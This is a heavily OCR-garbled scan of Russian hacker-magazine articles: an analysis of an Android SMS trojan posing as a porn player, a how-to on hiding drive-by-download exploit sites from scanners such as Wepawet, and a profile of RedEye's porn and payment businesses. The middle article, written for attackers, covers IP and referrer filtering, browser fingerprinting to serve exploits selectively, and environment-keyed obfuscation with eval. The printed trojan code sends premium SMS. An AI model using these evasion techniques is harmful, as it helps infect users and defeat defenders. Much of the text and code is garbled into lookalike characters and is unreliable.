чае используются только типы гама Ще, [ауоц{ и 
5{гп9. Как можно понять из их названия, первый 
отвечает за графические объекты, второй — за 
внешний вид приложения, третий — за строковые 
данные. В файле $гпд$.хт( содержатся данные о 
строковых переменных: 


<?хт1 уег$1о0оп="1.0" епсод91п8="и{+-8"?> 
<гезоигсе$> 

<5{г1п8 пате="арр_пате" >Апдго19Арр11са*1о0п1 
</5&г1п5> 

</гезоигсе$ > 


Если в файле рибИс.хт[ вводится переменная арр_ 
пате типа ${г!пд, то в $“гтд$5.хт[ она принимает 
вполне осмысленное значение Апаго9АррИсайопТ. 
В нашей малвари переменная арр_пате нигде 

не используется, хотя обычно на нее ссылаются в 
манифесте. Оставшаяся часть ресурсов располага- 
ется в папке гез, но к ней я вернусь после рассмо- 
трения манифеста. 
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МапНе$1.хт| 


Этот файл я также преобразовал в читабельный 
вид при помощи АРКТоо[. Манифест содержит в 
себе основную информацию, необходимую для 
корректного запуска и функционирования прило- 
жения: название пакета (раскКаде}, название при- 
ложения, выводимое пользователю [апдго!4 :[аБе[, 
название класса, который необходимо запустить 
[апЧго!9:пате), иконка приложения [апдго!:!соп] и 
т.д. А воти сам файл: 


<РхШ1 уег$1лоп="1.9" епсод1пр="иЕР-8"?> 
<тап1Ре${ расКаве="огё.те. ап@го1Ч9арр11са*1оп1" 
хт]1п$ : апаго1а=" Пр: //зспета$ . апаго1а. сот/ 
арК/ге$ /апаго1а" > 
<арр11са1оп апаго1а : 1соп="@агама61е/1соп"> 
<асЕ1\1%у апаго1аА: 1абе1="РогпоР1ауег" 
апЧго14 : пате=" .Моу1еР1ауег" > 
<1пфеп*-#1фег> 
<асЕ1оп апаго1А : пате="апагота. 
1п$епе.асЕ1оп.МАТМ" /> 
<сафевогу апаго1А : пате="апаго1а. 
1п{епф. сафевогу . ГАУМСНЕВ" /> 
< /1пеп{-#А1%ег> 
</асф1\1%у> 
</арр11са1оп> 
<и5е5$-регм1$$1оп апаго1А : пате="апаго1а. 
регт1 $$10п.5ЕМО_$М$" /> 
</тап1+е${> 


И, напоследок, самое интересное — права, необ- 
ходимые приложению. Они содержатся в ич5ез- 
реггп!$1оп. А исследуемому зловреду, как видно из 
кода, необходимы права на отправку 5М5 [апдго!а. 
реггп1$$1оп.5ЕМО_$5М5). 


КЕ 


Папка гез содержит непосредственно файлы ресур- 


сов. Внутри нее располагаются две папки: гама {е (МР. 
и [ауоц{. Их названия совпадают с типами ресурсов, 
описанными чуть выше. Весьма ожидаемо, что в 
первой папке содержится иконка 1соп.рпд. Название 
соп вводилось до этого в рчбИс.хи(. р шЮ 

А во второй — содержится конфигурационный файл —Исчерпывающую ин- 
пат.хгп(, отвечающий за внешний вид приложения: формацию по Апаго!а 


ЪОК можно получить 


<?хт1 мег$10п="1.0" епсод1пе="и+-8"?> здесь: деуеорег. 
<Е1пеагЁЕауоц* апаго14 : ог1еп а 1оп="\уег{1са1" апаго!4.сога/пдех. 
апаго14 : 1ауои* _м1АИ="®11] _рагеп*" Вии. 
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Мат файла а ль который расположен 
в подпапке МЕТА-МЕ 


апаго14 : 1ауоч{_ Пе1вН{="Я11 рагеп{" 

хм] п$ : ап4го1а=" Пр: //зспета$ . апаго14 .сот/арк/ге$/ 
апаго1а" >" <Тех&\/1ем апаго14 : 1ауоцч* _м1аА="#11 _рагепт" 
апаго1а: 1ауоцч*{_Пе1ёА{="мгар_сопфепе" апаго1а:* 
ех+="Не11о Апаго1а +гот МеЕВеап$" /> 
</Е1пеагЁГауои*> 


В этом конфигурационном файле задаются такие параметры, 
как схема расположения приложения (апЧго!Ч:отеп{аН оп в 
[/пеагЁауоц\), текст в объекте Тех{\Ме\и (Нео Апаго!4 гот 
Ме{Веап$]} и их размеры [апдго!а:[ауоц"_млЧВ и апаго!:[ауоц"_ 
Беопу. 


МЕТА-[пт 


В папке МЕТА-1МЕ находится сертификат приложения и кон- 
трольные суммы составных частей программы: иконки, мани- 
феста, Чех-файла и т.д. 

А теперь я возвращаюсь к последнему неразобранному файлу 

— с[а55ез.дех. Чтобы понять «полезную нагрузку» исследуемого 
зловреда, необходимо «вскрыть» этот контейнер. Для этих целей 
была использована бесплатная утилита Чех2]аг (соде.доосб(е. 
согп/р/Чех2аг). Она на выходе выдает }аг-файл, который уже 
можно разобрать без особых проблем. Стоит отметить, что поми- 
мо Чех2аг существуют и другие программы подобного назна- 
чения, например, Чедехег. Также существует софт, способный 
декомпилировать Р-код виртуальной машины ШаМК. 

После окончания работы 4ех?]аг я обнаружил рядом типичный 
]аг-архив, который незамедлительно распаковал. Вот, что ока- 
залось передо мной (рис. 43. 

Каждый с[а55-файл представляет собой скомпилированный код 
на ауа. Я воспользовался утилитой Уад, чтобы всех их декомпи- 
лировать. После этого передо мной оказались восемь файлов с 
понятным кодом на Уауа, который уже можно без проблем ана- 
лизировать. 

Пять из восьми оказались неинтересными. Они работают в 
связке с конфигами ресурсов и большого интереса не пред- 
ставляют: К.]а9, РКФаЦг.|а9, К$9гамае.}а9, К$(ауоц(.]ад и 
В$эттд.]а49. Остаются еще три. Я упоминал, что в основном 
манифесте содержится информация о стартовом классе, коим 
является МомеР{ауег. Следовательно, необходимо обратиться 
сразу к нему (фрагмент кода}: 


риб11с с1а5з$ Мом1еР1ауег ех%епа$ АсЕ1\у1*у 


{ 


руб11с Мом1еРТауег() 


| 


} 
риб11с мо1а опСгеате (Випа1е Бипа1е) 
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оне де вех декаде ре аобнжаложонно нинеое деи 
оао ачеечие "рокер чар 
Я Рае во] ценны Фея офе и Си 0г "ча ди оеСВсООи | Моерчнии СЯ 
Рауег вой сшееае бабах Зы" ры сео. та. ети вссйевс 1.9. Сех 
- одареторчеодиивучаеез иронии 
Е Раны вок евеа бек офекоуь зв ого. та сыт саЗасковевьаи Роба С 
я Рунет „ВСВ «Се р „феек За ры ог. ттие тк бадорбеиьси 1 лероит, ых 
"3 Рае вр серва фк дак од ры серны гео вррбсвбот 1 ме я 


Файлы, полученные после распаковки |аг-архива 


5ирег. опСгеате (Бипа1е); 
ОафаНе1рег дафапе1рег = пем ВафаНе1рег (1015$); 
1+ (аакапе1 рег. сапме()) 
{ 
ТехЕ\1ем +ехЕ\у1ем = пем Тех&\М1ем (1115); 
Капот гапаот = пем ВКапаом(); 
техЕ\1ем. зе%Тех* ( 
"\и041Е\и043Е\и0434\и043Е\и0436" 
"\и0434\и0438\и0442\и0435..."); 
5е{Сопфеп®\/1ем (техфу1ем); 
5и5Мапарег этзтапарег = 5Зт$Мапазег. ве*Оефаи1* (); 
5&г1п2Ви11аег $&г1паби11аег = (пем 5&г1п2Ви11аег( 
) аррепа Е. 
1п{ 1 = гапаот.пехЕТи* (0х+4240) + 0х186аб; 
5&г1п8 $ = 5&г1п2би11аег.аррепа(1).+05$%г1пё(); 
ИИ: 
пы: 


апаго14.арр.Репа1п=Тпфеп{ репа1п51пеп{ = 
апаго14.арр.Репа1п=Ттфеп* репа1п21пептЕ1 = 
$т5тапазег. зепаТех{Ме$5азе ("***", пи11, $, 


реп91п51пеп*, реп91п51п%еп*1); 


Вп1$И(); 


Код класса ШОайаНефег располагается в оставшихся двух фай- 
лах — Па{аНе(рег.ад и ОайаНефрег$ОрепНешфег.а9. С помощью 
этого класса зловред проверяет, запускался ли раньше он в этой 
системе или нет [! да{аВе[регсапмие(]]. Выполняется это с помо- 
щью очень занятной техники. Вначале малварь пытается открыть 
или, если не получилось, создать 5 | Ще-базу Ч\мар.ЧБ. Затем он 
прочитывает данные из таблицы {аб {е1 и если они равны строке 
«\/а5», то завершается. А в противоположном случае — он запи- 
сывает туда именно эту строку и продолжает работать. 
Далее на экран выводится надпись на китайском с помощью 
{ехмем/.зе(Тех(. По-видимому, она означает что-то вроде «Идет 
загрузка...». 

Заканчивается это все составлением текста СМС из произволь- 
ных чисел (гапдот.пехИ п? и отправкой сообщения (5ттападег. 
зепЧТех{Меззаде]. Я значительно сократил исходный код. На 
самом деле отправляется несколько сообщений, но это не столь 
важно. 


Заключение 


Таким образом, наш сегодняшний мобильный зловред оказался 
очень простым — весь его полезный функционал — это отправ- 
ка короткого сообщения на премиум-номер. Разобрать же мь 
его решили по двум причинам — во-первых, он работает под 
Андроид :], который сейчас очень активно набирает обороты, и 
в маркете которого периодически проявляются, мягко говоря, 
непроверенные программки. Во-вторых, нас удивил реализо- 
ванный в нем способ проверки на предыдущий запуск приложе- 
ния. 2 
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МАЁМ/АКЕ 


Ш Ш Длександр «Когзе» Раздобаров 
Андрей Петухов (апдгереиКПо\.могарге$ $. сот) 
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Маскируем вредоносные 
саиты от\ммераме! 
иего друзей 


©В этой статье мы поговорим об атаках Омуе-Бу-Оомип(оав. 
Напомним, что целью этих атак является распространение 
вредоносного кода, а реализуются они через привлечение жертв на 
вредоносный сайт с последующей эксплуатацией уязвимостей в ПО 
(браузер, Казпр[ауег, раР\мемег, компоненты АсёмеХ ит.п.). 


Любой школьник может осуществить подобную атаку по принципу 
«сделай сам». Действительно, достаточно регистрировать домен 
где-нибудь на кокосовых островах, развернуть сайт с доступны- 

ми эксплоитами и разослать ссылку на него своим друзьяшкам в 
социальных сетях. Цинично и очень заметно. А раз так, то и время 
продуктивной работы такого сайта будет весьма и весьма непро- 
должительным: либо забанят провайдеры и регистраторы, либо сайт 
попадет в черные списки поисковых систем, либо в базы антивиру- 
сов. Достаточно логично реализовать какие-нибудь меры для прод- 
ления жизни вредоносного сайта. В этой статье мы рассмотрим, как, 
используя возможности веб-сервера и технологий НТМ!+./5+С55, 
можно замаскировать поведение вредоносного сайта: наша задача 


сделать так, чтобы никто, кроме уязвимых клиентов не заподозрил 
вредоносный контент на сайте. 

Проверять результаты мы будем на сервисе с родины светозарных 
джедаев — м/ера\мие{ ([мера\мме{.с®.ис$Ь.еи/}, для которого создателями 
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были заявлены показатели обнаружения под 100%. 


Фильтрация 


Первое, что приходит в голову — сделать фильтрацию по 
|Р-адресам. В самом деле, нам абсолютно незачем выдавать экс- 
плоит по запросу от гугла или вендора, работающего в сфере 
информационной безопасности. Более того, списки нежелатель- 
ных |Р-адресов лежат в открытом доступе, и компилировать их 

с нуля нет необходимости. При поступлении запроса с адреса 

из списка можно выдавать либо обычную страницу, либо делать 
перенаправление на какой-нибудь сайт — дело вкуса. Черный 
список при желании можно расширить |Р-адресами выходных 
узлов из Тора (ВИ рз://свеск.{огрго[ес*. ога/са!-Бтп/ТогВиКЕхН 1. 
ру] — во избежание. А еще можно запоминать |Р-адреса жертв, 
допущенных до эксплоита, и при их повторном посещении давать 
от ворот поворот [мы хотим избавиться от повышенного интереса 
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ЕБс-фу опзсто]1=вакеА АХ гесиез (1, ета?) > 
| КБЕБЕХорЕ><ЬЕЬЕ> 

| «БЕЗЬЕ ЕЗЬЕ» 

«ВЕБЕ БЕУЕБЕНБг> 

‘тира аабоРосиз /> 


@</ьоау> 


А]АХ-запрос через событие оп$сго!! 


каста ре Етре"фехЕ/ )атавстаре"> 
уйг ЗЕ = пам Оасе дослььем Е. осно Ее; 
чат ег = "бы -ф, >": ИХ ЧаегЕ[]:“ УСЕЕ Ау Е; 
маг Кау = ЧЕ. сеЕНоНЕе() № 8; 
чат геныйЕ ="*; 
Готов ЕГ, ег: +5] 
Е 
гезиЕЕ +=55 Ел, ггоесвагсове( Кор“ аЕг, спагсоаеАт (1): 
ей (тезоЕЕ]: 
Ре жст ре 


Шифрование с использованием [а$1МоаЙед-заголовка 


пользователей, подвергшихся атаке, — пусть считают, что это 
была магия). 

В качестве дополнительной меры можно обрабатывать только 
запросы с правильно выставленным ге еггег’ом. Например, если 
мы раскидываем ссылку на вредоносный сайт по пользовате- 
лям «мордокниги», то ожидаемый нами гееггег будет содержать 
Тасероок. 


Нпдегрипйпа 

Казалось бы, фильтрации по |Р-адресам достаточно. Но нет. 
Во-первых, боты зесигКу-провайдеров могут зайти через прокси- 
серверы, для которых полный список |Р-адресов ты вряд ли най- 
дешь, да и изменяться он будет очень часто. Во-вторых, в интер- 
нете полно провайдеров сервиса Ореп\РМ, а в-третьих, никто 

не может запретить аналитику зайти на твой сайт из дома, через 
провайдера с большим пулом глобальных адресов, раздаваемых 
динамически (например, Стрим). В качестве второго уровня про- 
тиводействия обнаружению, мы будем осуществлять обнаружение 
роботов и эмуляторов браузеров (см. НипШп(), а также софта, на 
котором наши эксплоиты не будут работать. Этим счастливчикам 
мы тоже вернем невредоносный контент и попросим заглянуть 
через недельку. 

Первый шаг — это проверка человечности нашего клиента. На ум 
приходят использование САРТСН'и или квадратика с подписью 
«нажми на меня», или регистрация событий от мыши или кла- 
виатуры (если видим событие оптоизетоуе и делаем вывод, что 
не робот). Первые два варианта снижают прозрачность атаки, что 
достаточно плохо. 

Определение ПО на стороне клиента в ммеб'е — задача не новая и 
имеет несколько вариантов решения. Основная идея фингерпринтига 
— проверить особенности поддержки софтом той или иной специфи- 
кации или ее расширений: НТМЕЪ, ]амуаэспр, СЪЗи т.п. Итак, мы рас- 
смотрим следующие методы фингерпринтинга: 

1. Соотнесение заголовка Цзег-адег( с особенностями интерпретации 
]ауа5спрга. 

2. Поддержка НТМИ5. 

3. НТМЕ + еуег\(5. 

4. Дополнительное 110. 

Лучшее из этих методов мы немедленно используем в своей иннова- 
ционной деятельности. 

1. Соотнесение заголовка Ц5ег-ацеп с особенностями интерпрета- 
ЦИИ У]ауа5спрга 

Добровольно от клиента мы получаем лишь заголовок ичзег-адег\, 

но верить клиенту на слово мы не будем, ведь заголовок может быть 
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Вызов аей(1) через локальную СУБД 


выставлен как угодно. Более того, эмуляторы браузера обычно не 
сознаются в своей неполноценности и пытаются выдать себя за нор- 
мальный браузер. Первый шаг — определение вендора браузера. 
Традиционно вендора определяют по интерпретации специфических 
выражений на ./5. 

2. Поддержка НТМЕ5 

В последнее время в интернетах холиварные споры насчет право- 
славности браузеров перешли на следующий этап: теперь все меря- 
ются поддержкой возможностей НТМЕ5. Поэтому появилось множе- 
ство тематических сайтов с данными о различных версиях различных 
браузеров [например, сап!изе.сога, Бгомизегзсоре. ога]. Мы же будем 
использовать эти данные для выявления версии браузера. 

Итак, построим простенький пример, иллюстрирующий эти два 
пункта: 


Фингерпринтинг Е1геФох версии 4.0 и старше 

<$\5 хм11$ : $/5=" Ир: / /ммм.м3.ог5/2000/5$\5" 

хт]1п$=" Ир: //ммм.м3 .ог8/2000/5\8" у1емВох="0 9 200 100" 
и1аеИ="@рх" Пе1й*="@рх" 1а="1п11пе$\б" > 

</$\5> 

<5сг1ре фуре="{ехЕ/)ауа$сг1ре"> 

\аг 15$ЕЕ = ! ! (1*({Ео5%г1п8: 0 , уа1иеб+ :РипсЕ1оп(х){ 
гефигп !!х;}})); 

\уаг 1п11пе5\б = доситеп* . ветЕ1етеп*ВуТта ("1п11пе5\б"); 
\аг 1$ЕЕ4 = 1$ЕЕ && (1п11пе5\б != пи11); 

</5сг1рф> 


3. НТМЕ + события 

Помимо интерпретации //$ и поддержки НТМЁЕЗ мы будем прове- 
рять корректность загрузки и отображения страницы по событиям 
5. Идею того, что и как проверять, мы позаимствуем из реа- 
лизаций атаки Х$5. В Х$$ существует множество векторов атак 
(посмотреть их можно на Вип зес.ога], завязанных на события 
45, такие как опюси$, опЬ г оп$сгоЦ. Зачем нам все это «слож- 
ное, ещеи Х$5», если на предыдущих шагах мы определили 
браузер? Ответ прост: не стоит забывать про эмуляторы! Так как 
в эмуляторе может отсутствовать, например, графический рен- 
деринг страницы (он отсутствует, например, в НТМИОпи, который 
является нашей косвенной целью), мы будем обнаруживать их 
здесь. Для этого подойдет вектор с событием опзсго[ с сайта 
Вит 5ес. По выполнению события будем посылать АЗАХ-запрос 


на сервер для получения дальнейших указаний. 


<Боду оп5сго11=такеАЗАХгедие$* (1, е\уа1)> 
<бг><Бг><Бг><Ьг><6г> 
<бг><6г><Бг><Бг><Бг> 
<бг><6г><Ьг><Бг><Бг> 
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\\Мера\ммЕ собственной перцовой 


<1при{ ачфо+оси$ /> 

</Боду> 

/* функция таКеАЗАХгедцие${ (рагат, са11БасКк) должна быть 
описана дополнительно */ 


4. Дополнительное ПО 

В последнее время основной целью для атак стали не сами 
браузеры, а стороннее ПО, которое в них используется: Ца$В, раТ, 
1ауа, Аси\ех, ес. Соответственно, помимо браузера необходимо 
определять и их наличие. Посмотреть, как это делается, можно 


тут: рапорисИск.еН.ога. 


Больше эксплоитов — больше . 
«осчастливленных» пользователеи 


В качестве последнего улучшения попытаемся повысить эффек- 
тивность атаки путем размещения нескольких эксплоитов. Для 
этого будем передавать данные фингерпринтинга на сервер, а 
сервер на основе этих данных будет возвращать редирект на 
страницу с эксплоитом, подходящим под конфигурацию. 


Обфускация 


Обфускация кода — задача такая же не новая, как и фингер- 
принтинг ПО. Для Лауа5 спирта существуют готовые решения, 
такие как |]епсоде (1-8. [р/рибИс/Депсоде. Вит. Можно было бы 
ограничиться этим, но мы попытаемся создать дополнительные 
трудности тем, кто захочет изучить наши скрипты. Нашей целью 
будет не столько обфусцировать код, сколько сделать невоз- 
можным его повторный запуск в других условиях. Для этого код 
мы будем шифровать, но шифровать не просто так, а с ключом, 
который зависит от окружения. Например, можно использовать 
значения заголовков НТТР, кукисов, даты и времени и их комби- 
наций. Например: 


Шифрование с использованием 1а$%{Мо41Нед-заголовка 
<5сг1ре фуре="ех{/)ауазсг1 ре" > 

\уаг 4% = пем Ба*е (аоситепЕ .1а$Мод1Аеа); 

\маг $%г = "41`ма-4,>"; //ХОВ?еа "а1егЕ(1);" млн Кеу 5; 
\уаг Кеу = а&.вефНоиг5() % 8; 

уаг гези1\ =""; 

Фог(1=0;1<$%г.1епёЕВ;++1) 


{ 


гези1{ +=5%г1п2 .+готСВагСоде (Кеу^$Ег.сПагСодеА*(1)); 
} 
е\уа1 (ге5и1*); 
</зсг1рф> 


Кроме того, если совместить обфускацию с фингерпринтингом, то 
в качестве составляющей ключа можно использовать фингерпринт 
целевой конфигурации ПО пользователя. В качестве небольшого 
бонуса к этому можно использовать следующие приемы: 

1. Переопределение функций и констант. 
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Обфусцируем /ауазсир! с помощью |епсоде 
Пример: 


уаг Фипс = еуа1; 
Фипс ("а1ег*(1)"); 


2. Использование Хра{Й в ]ауа5спри. 
Пример: 


Доступ к <р>-тэгам через Храп 

<5сг1ре фуре="фех{/)ауа$сг1ре"> 

\уаг рагаёгарй$ = досутеп* .еуа1иа*е("//р", 
осичтепе, пи11, 
ХРаЕАКези1*.АМУ_ ТУРЕ, пи11 

); 


А ЕРТрЕ > 


3. В НТМЕ5З появился такой объект, как локальная СУБД. 
Нам это поможет тем, что результат, полученный ЗЕЁГЕСТ- 
запросом, можно передавать в функцию — например, в ема(. 
Соответственно, код, который мы хотим исполнить, можно 
обфусцировать средствами 501. Также, если браузер под- 
держивает Естазсг!р1 Тог ХМЕ, можно использовать ХМЕ - 
выражения: 


Вызов а1егЕ(1) через локальную СУБД 
<$сг1рт фуре="ТехЕ/)ауазсг1ре" > 
орепрафабазе( '',1,1,0).+гапзасЕ1оп(ФипсЕ1оп($){ 
$.ехесифе$а]1 ( 'ЗЕЁЕСТ "а1" || "ег" || "(1)"', [], 
ФипсЕТоп ($ , гези1$5){ 
Фог(1 1п гези15$.гом$ .1%ет(@)) 
е\уа1 (гези1$ .гом$.1%ет(0)[1]) 
}) 
}) 


</зсг1ре> 


Итог 


В статье были описаны базовые идеи по продлению времени 
жизни сайта с подозрительным контентом. Для полного пости- 
жения кунг-фу читателю предлагается посетить приведенные 
ссылки и слегка пофантазировать. Правда, как показала прак- 
тика, даже таких несложных манипуляций достаточно, чтобы 
убедить м/ера\ме{ в том, что наш сайт не представляет угрозы для 
общества. = 
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— Интересная статья 
Брайна Кребса. 

® — 
СПгопорау объявил 

о взломе своей базы 
данных и приостано- 
вил работу. 

® 

— Пример одного из 
первых Рейп Топов 
КедЕуе. 

® 

— Статья в \\Мапо{оп 
Ро. 


— Слив со сторо- 
ны ФСБ. 


©КедЕуе или Павел Олегович Врублевский — по-настоящему оди- 
озный персонаж, олицетворяющий собой целую эпоху из начала 
нулевых. Порно-бизнес, партнерки по продаже таблеток, процес- 
синг платежей за поддельные антивирусы и незаконная финансо- 
вая система Ге{Паг@, кинувшая своих пользователей на 19 мил- 
лионов долларов. В общем, несомненно талантливый и крайне 


интересный человек! 


Зарождение Империи 


Карьера КедЕуе'я началась в 1999 году. 
Паша создал платный порносайт, где за 
доступ к картинкам (видео тогда прак- 
тически не было] нужно было платить 
своей кредитной картой. Сайт назывался 
‚ Это была сборная солянка 
из всего, что только можно было тогда 
найти: от обычного порно до гаре и 200. 
Сделать платный сайт тогда было непро- 
сто. Вся сложность заключалась в вопро- 
се приема оплаты [в то время бесспор- 
ным лидером в данной теме была амери- 
}. С наполне- 
нием все было гораздо проще. Контент 


канская компания 
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сливался с зарубежных вебсайтов или 
выкачивался из пе\м/з-групп. Копирайты и 
авторские права тогда не были большой 
проблемой, главное было найти фотки без 
надписей. 

Само по себе обладание платным сайтом 
не приносит денег, если на этом сайте 
нет посетителей и, самое главное, поку- 
пателей. А поскольку КедЕуе выбрал 
довольно своеобразную нишу, в которой 
тогда никто по-серьезному не работал, 
ему было крайне сложно продвигать свой 
сайт. Не с кем было налаживать отно- 
шения по обмену трафиком, негде было 
рекламировать проект. Отсутствие про- 
даж на платнике нисколько не огорчило 


нашего героя. Паша не унывает и создает 
форум для адалт-вебмастеров под назва- 
нием 


«Крутоп» 

«Крутоп» — это, без преувеличе- 

ния, целая веха в российском адалте. 
Примерно до 2005 года это был самый 
авторитетный форум порновебмастеров. 
Позже «Крутоп» сдал свои позиции с про- 
фессиональной точки зрения и уступил 
место и другим. 

Сила «Крутопа» была не в знаниях или 
помощи новичкам [новичку там вообще 
не светило прижиться). «Крутоп» всег- 
да отличался своей непередаваемой и 
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Кому я должен — всем прощаю 


неподражаемой атмосферой: это была 
термоядерная смесь из юности, стеба, 
черного юмора и наплевания на все 
социальные установки. С появлением 
«Крутопа» жизнь платников и топов нача- 
ла стремительно меняться: сразу пошел 
трафик, начали появляться партнеры для 
Рогпосгифо.пи, привлекающие на сайт 
покупателей за 50%-ное вознаграждение. 
Даже в 2000 году в интернете было очень 
много обычной порнухи. Нужно было 
найти свою нишу и закрепиться в ней: 
что-нибудь такое, где не было бы конку- 
ренции с американцами, которые держа- 
ли 95% адалтового бизнеса. 

Нужен был экстрим, граничащий с фолом, 
с которым не хотели бы связываться 
братья из-за океана. Для КедЕуе такой 
золотой нишей стал Каре. Созданная им 


партнерская программа сазВ.рогпосгито. 


пи стала самой известной «Рейп- 
партнеркой». 


ассвет 
РА Сазй 


Время с 2000 по 2002 годы было расцве- 
том Рогпосгио СазН [РС}. На тот момент 
в партнерке было 9 сайтов, так или иначе 
связанных с рейпом. Как и везде, тут 
тоже работало правило 80/20: 80% про- 
даж делали 20% сайтов. Среди проектов 
особенно выделялся знаменитый плат- 
ник бсгеат апа Сгеат или «СиК» (Мм. 
эсгеатапЧсгеат.соп?]. 

Крутая для 2000 года фишка, которую 
КедЕуе применил для «СиКа», был флеш: 
в начале тысячелетия это была реальная 
технологическая инновация для порно- 
сайтов. Два других ресурса партнерки — 
ммм. раа(е$.согп и ммм. мет согтих. 


сот — были наполнены порнушными 
комиксами, которые создавал известный 
американский ВОЪ$М-художник по имени 
Сагу Кобег{$. Его биографию можно 
посмотреть здесь — БН. (у/р7 1 п/5. 

Для русских понять привлекательность 
комиксов достаточно сложно, но амери- 
канцы всегда были помешаны на этом. 
Такой развитой субкультуры по потребле- 
нию комиксов, как в США, нет больше 
нигде. Создать такие сайты, не понимая 
и не увлекаясь комиксами, договориться 
с американским художником и постоянно 
получать от него новый материал — разве 
это не круто? Честно, очень круто! 

В то время все сайты работали на базе 
самого крупного адалтового биллинга 
1Б1Ц.сот. По некоторым данным в нача- 
ле нулевых он процессил порядка 35-40 
миллионов порнодолларов в месяц. Это 
очень большие деньги для 2001-2002 
годов [примерно миллионов 200 — на 
сегодняшний день). 

Совокупность таких факторов, как уни- 
кальные сайты с редким и экстремальным 
контентом, наличие стабильного белого 
биллингового решения, растущая попу- 
лярность форума Сгщор, умение КедЕуе 
пропиарить себя и свои проекты, сделали 
Рогпосгцо СазВ самой крупной адалт- 
партнеркой среди русских вебмастеров. 
Примерный оборот Рогпосгу{о СазВ был в 
районе 170 — 200 тыс. долларов в месяц 
[и это в 2001-2002 годах!). Посмотри, что 
можно было купить на эти деньги в то 
время, и ты поймешь размах. 


Закат РогпосиМо Са$п 


Черные тучи над Рогпосгщо СазВ нависли в 
конце 2007 года, когда 15 отказался даль- 
ше обслуживать пашины сайты. Начались 
скитания по разным небольшим биллинг- 
компаниям, которые с трудом могли пере- 
варить оборот Рогпосгито СазВ. При каждой 
смене биллинга что-нибудь обязательно 
терялось, и Паша часто попадал на деньги. 


Павел Врублевский: история успеха 


1999 


Порносайт Рогпосги{о.пи 


Свою карьеру Павел начал с создания плат- 
ного порносайта рогпосгифо.пи со стран- 

ной специализацией: 200- и гаре-порнуха. 
Наполнение заимствовалось с зарубежных 
вебсайтов, а основная сложность заключалась 
в сортировке картинок: в интервью Гогбез$ 
Павел с отдельным упоением вспоминал, как 
он с товарищами сутками сортировал фотогра- 
фии. Принимать оплату Павел решил с помо- 
щью банковских карт и процессинга 16 Щ.согп. 


ый 


2000 


Форум Сгщор.пи 


Порносайтс ворованным зоофильным порно не 
нашел успеха, но Павел не отчаивался. В самом 
начале тысячелетия КедЕуе создает форум для 
владельцев порносайтов, где пытается собрать 
сообщество русскоязычных администраторов 
порносайтов и аккумулировать опыт и связи 
этой области в одном месте. «Крутоп» — это 
целая веха в российском адалт-бизнесе. При- 
мерно до 2005 года это был самый авторитет- 
ный форум адалт-вебмастеров. 
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Но КедЕуе был бы не КечдЕуе, если бы 
оставил все на волю случая. В голове 
рождается простая идея: если проблема 

с биллингами, то надо создать свой! На 
этой почве Павел Олегович знакомится 

в конце 2002 года с Оезр’ом [еще один 
интересный персонаж), у которого на 

тот момент уже был свой малюсенький 
биллинг, софт и опыт в этой области. 
Таким образом появляется компания 
СНКОМОРА\У В.\., регистрируется биз- 

нес в Нидерландах. Почему именно 
Нидерланды? Помогли легальность рейпа 
в этой стране и развитый рынок онлайн- 
платежей. К тому же, в Голландии работал 
и Рони Бирнаерт [Копте Веегпаег{), один 
из партнеров Рогпосгифо СазП, которо- 

го КедЕуе уговорил стать директором 
СНКОМОРАУ В.\. 

Тем не менее, негативную тенденцию 
переломить не удалось: собственный про- 
цессинг — это еще не собственный банк, 
а банки начали отказываться процессить 
рейп. Не помогли даже переименования 
всех платников, избавление от слова гаре 
и попытки свести содержание всех сайтов 
к Гап{азу дотипаНоп или ВОЗМ. В резуль- 
тате оборот Рогпосгцко СазВ в середине 
2009 года сошел на нет. 


Реага «до» 


Ге{Ваг — это интернет-банк, в котором 
можно было открыть виртуальный счет с 
возможностью получения на него безна- 
личных платежей из любого банка мира. 
Ге{Вага Е!папсе действовала как корпора- 
ция финансовых услуг, а также как заре- 
гистрированный банковский посредник с 
многочисленными банками-партнерами 
по всему миру. Основатели системы 
Ее{Вага.617 в конце 2002 года договори- 
лись с КедЕуе о рекламной поддержке их 
сервиса на его форуме Сгиуор.пи. 
Поначалу вмешательство Врублевского 

в топики на Сгубор.пи о деятельности 
Ге{пага было минимальным, максимум, 


2001 


Партнерка Рогпосг\%о Са$В 


Партнерская программа СазВ.Рогпосгуо.пи 
функционировала по стандартной схеме. Это 
был каталог из 9 порно-сайтов, а участники 
программы зарабатывали деньги, привле- 

кая на эти сайты клиентов — покупателей 
порнухи. Самым популярным и прибыльным 
проектом был сайт 5сгеаг ап4 Сгеагп (\лллм/. 
сгеапапасгеат.согп]. Примерный оборот 
Рогпосгщо Сазр составлял $170-200К в месяц, 
и все деньги процессились через 65 Щ.сот. 
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якобы «независимое» мнение, что ребята 
делают все очень неплохо, за исключе- 
нием парочки мелких «но». 

Время шло, количество часов, проведен- 
ных в разговорах основателей Ее{ага с 
КедЕуе ‘ем, уже исчислялось сотнями, и, 
видимо, у них появилось ощущение, что 
КедЕуе — человек серьезный, и с ним 
уже можно переходить на новый уровень 
бизнес-отношений. 

К концу 2003 года КедЕуе уже выступа- 

ет как официальный партнер системы 
Ее{бага.6!7. Это известие, опубликован- 
ное на Сгибор.пи, бесспорно, вывело 
Ге{Вага на новый уровень, как по количе- 
ству клиентов, так и по оборотам. Также 
замечу, что до 2007 года публичный 
рейтинг КедЕуе'я среди комьюнити адиЦ- 
мастеров зашкаливал, так как Павел был 
одним из самых известных и одним из 
самых авторитетных вебмастеров рунета. 
Следующие несколько лет Ееага.61х рос 
стремительными темпами. Среди всех 
финансовых сервисов, которые в те годы 
были на рынке, Ее ага был самым круп- 
ным, самым авторитетным и самым рас- 
крученным. 

Ге{Ваг@ пережил многие другие подобные 
системы: Уатбо [прочти название систе- 
мы наоборот и замените букву «\» на ее 
русский аналог на клавиатуре, букву «Н»}, 
СарКа(СоЦес{, Есча{юг.617, которые кинули 
своих клиентов и исчезли. Подводя некий 
промежуточный итог, можно сказать, что 
2003-2007 годы стали годами расцвета 
системы Ееага. 617. 

В 2007 году Павел выкупил долю основа- 
телей Ее{ага.617 и стал владельцем Фета. 


Гаага «после» 


Ге{пага цвел и пахнул все сильнее с каж- 
дым годом. Но амбиции — это самое слабое 
звено товарища КедЕуе. Появился у него в 
то время новый партнер Михаил. Все было 
бы классно и замечательно, только Михаил 
оказался 100%-ным бизнесменом с силь- 


2002 


Создание СНКОМОРА\У В.У. 


В конце 2002 года 6 отказался обслуживать 
порносайты Павла, и начались скитания по не- 
большим биллингам, которые приносили толь- 
ко кучу проблем: никто не хотел процессить 
гаре-порнуху втаких объемах. В итоге Павел 
создал в Нидерландах компанию СНКОМОРАУ 
В.\., директором которой он уговорил стать 
